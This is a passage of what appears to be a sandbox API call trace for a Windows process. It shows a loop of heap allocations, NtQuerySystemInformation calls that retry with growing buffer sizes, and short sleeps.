ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.316] Sleep (dwMilliseconds=0x110) [0232.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.329] Sleep (dwMilliseconds=0x110) [0232.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.343] Sleep (dwMilliseconds=0x110) [0232.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.365] Sleep (dwMilliseconds=0x110) [0232.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.377] Sleep (dwMilliseconds=0x110) [0232.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.397] Sleep (dwMilliseconds=0x110) [0232.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.406] Sleep (dwMilliseconds=0x110) [0232.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.440] Sleep (dwMilliseconds=0x110) [0232.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.458] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.458] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.459] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.460] Sleep (dwMilliseconds=0x110) [0232.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.472] Sleep (dwMilliseconds=0x110) [0232.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.486] Sleep (dwMilliseconds=0x110) [0232.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.501] Sleep (dwMilliseconds=0x110) [0232.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.520] Sleep (dwMilliseconds=0x110) [0232.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.535] Sleep (dwMilliseconds=0x110) 